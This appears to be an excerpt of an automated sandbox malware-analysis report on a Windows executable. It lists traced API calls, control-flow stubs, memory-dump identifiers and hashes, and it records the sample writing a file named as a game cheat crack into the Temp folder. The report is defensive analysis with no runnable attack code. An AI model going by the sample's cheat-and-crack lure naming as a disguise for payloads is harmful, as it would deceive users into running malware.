                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                                                                                                                                                                                                      • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 481 4053cc-4053da CreateDirectoryA 482 4053e0 GetLastError 481->482 483 4053dc-4053de 481->483 484 4053e6 482->484 483->484
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,00403100,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403299), ref: 004053D2
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004053E0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                                                                                                                                                                                                                                                                      • Instruction ID: 0a32bba0594ce4c50c7d18531d00583a5fdebb7a5bad339d624f0ac39b1a71a3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0C04C30A08501EBD6105B31AE49B177AE49B547C1F1045366506E41E0D7B49411D93E

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 498 403093-4030b2 ReadFile 499 4030b4-4030b7 498->499 500 4030be 498->500 499->500 501 4030b9-4030bc 499->501 502 4030c0-4030c2 500->502 501->502
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EC0,000000FF,00000004,00000000,00000000,00000000), ref: 004030AA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                                                                                                                                                                                                                                                                                      • Instruction ID: fff8dc69d300bf088447089d7068fb6aaa903b2c1760e3ba56c5ad9840b64b03
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAE08C32161118BBCF215E52EC00EE73B5CEB047A2F008033BA14E62A0D670EA14DBAA
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFF,?), ref: 004030D3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                                                                                                                                                                                                                                                                                      • Instruction ID: 89776e93a0172b97a38fb7948c015c90ed7fb14eba3da05579cbd58eb2c2bcc6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87B01271644200BFDB214F00DF06F057B61A794701F108030B744380F082712830EB1E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00403340,00000000), ref: 00403525
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8c26942ae0773f9dbc702252541389aaf768f8ffdabc22c98b52bd8a09ae71d5
                                                                                                                                                                                                                                                                                      • Instruction ID: d1a415a1e30e97e21d6e0245b321a96cd967b9cfe2038280d4bc5e0259fe27b2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c26942ae0773f9dbc702252541389aaf768f8ffdabc22c98b52bd8a09ae71d5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CC01230544A00A6C2647F7C9E0B6053A156740336FD04725B175B10F3C73C5A41552E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040502A
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405039
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405076
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 0040507E
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 0040509F
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050B0
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050C3
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050D1
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050E4
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405106
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040511A
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040513B
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040514B
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405164
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405170
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405048
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403E92: SendMessageA.USER32(00000028,?,00000001,00403CC3), ref: 00403EA0
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040518D
                                                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004F5F,00000000), ref: 0040519B
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004051A2
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004051C6
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004051CB
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 00405212
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405244
                                                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00405255
                                                                                                                                                                                                                                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040526A
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040527D
                                                                                                                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052A1
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052DC
                                                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004052F2
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052FB
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405305
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405319
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405331
                                                                                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 0040533C
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00405342
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                                                                      • String ID: {
                                                                                                                                                                                                                                                                                      • API String ID: 590372296-366298937
                                                                                                                                                                                                                                                                                      • Opcode ID: 24d5f79863eab039e00deff6ffcfe7a635ba4a893b6a7c8bad5bc7ec4ae7b328
                                                                                                                                                                                                                                                                                      • Instruction ID: 9773a58430cbfeecb670b401eb949321dafbae4239e93fa01985779c5be3160a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24d5f79863eab039e00deff6ffcfe7a635ba4a893b6a7c8bad5bc7ec4ae7b328
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADA14A70900208BFDB11AFA1DC89AAE7F79FB08354F40853AFA04BA1A0C7755A51DF99
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004047F3
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404800
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0040484C
                                                                                                                                                                                                                                                                                      • LoadBitmapA.USER32(0000006E), ref: 0040485F
                                                                                                                                                                                                                                                                                      • SetWindowLongA.USER32(?,000000FC,00404DDD), ref: 00404879
                                                                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040488D
                                                                                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048A1
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 004048B6
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048C2
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048D4
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004048D9
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404904
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404910
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049A5
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049D0
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049E4
                                                                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404A13
                                                                                                                                                                                                                                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A21
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404A32
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B35
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B9A
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BAF
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BD3
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404BF9
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404C0E
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404C1E
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C8E
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D37
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D46
                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D66
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404DB4
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404DBF
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00404DC6
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                      • String ID: $M$N
                                                                                                                                                                                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                                                                                                                                                                                      • Opcode ID: 71b8b6f4bffc85469490dd9785970581ca59a6eef214a627e944a707e06e44fc
                                                                                                                                                                                                                                                                                      • Instruction ID: 458a4472cc575749f24c7bcde6f1b2e9246033a2a8d3a9469834700d3721ba37
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71b8b6f4bffc85469490dd9785970581ca59a6eef214a627e944a707e06e44fc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7028EB0A00209EFDB21DF55DD85AAE7BB5FB84314F10813AF610BA2E1C7799A41DF58
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004042EA
                                                                                                                                                                                                                                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404314
                                                                                                                                                                                                                                                                                      • SHBrowseForFolderA.SHELL32(?,00429490,?), ref: 004043C5
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004043D0
                                                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32( C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe,0042A0C0), ref: 00404402
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?, C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe), ref: 0040440E
                                                                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404420
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405446: GetDlgItemTextA.USER32(?,?,00000400,00404457), ref: 00405459
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E03: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\EsgeCzT4do.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E8,C:\Users\user\AppData\Local\Temp\,00000000,00403299), ref: 00405E5B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E03: CharNextA.USER32(?,?,?,00000000), ref: 00405E68
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E03: CharNextA.USER32(?,"C:\Users\user\Desktop\EsgeCzT4do.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E8,C:\Users\user\AppData\Local\Temp\,00000000,00403299), ref: 00405E6D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E03: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E8,C:\Users\user\AppData\Local\Temp\,00000000,00403299), ref: 00405E7D
                                                                                                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00429088,?,?,0000040F,?,00429088,00429088,?,00000001,00429088,?,?,000003FB,?), ref: 004044DE
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404652: lstrlenA.KERNEL32(0042A0C0,0042A0C0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040456D,000000DF,00000000,00000400,?), ref: 004046F0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404652: wsprintfA.USER32 ref: 004046F8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404652: SetDlgItemTextA.USER32(?,0042A0C0), ref: 0040470B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe$A$C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                                                                      • API String ID: 2624150263-835313967
                                                                                                                                                                                                                                                                                      • Opcode ID: f885f0f31c4282fba39027c95cf5d7278b52421c3caad3c2cc32003d823a0b3d
                                                                                                                                                                                                                                                                                      • Instruction ID: 25cf576a769d2d8a049a3aeadb65d5b4cdf4f75aeaeb5f9dd55cec19ee375662
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f885f0f31c4282fba39027c95cf5d7278b52421c3caad3c2cc32003d823a0b3d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6A170B1900218ABDB11AFA5DC41BAF77B8EF84315F10843BF611B62D1D77C9A418F69
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004054E4
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(0042B0C8,\*.*,0042B0C8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040552E
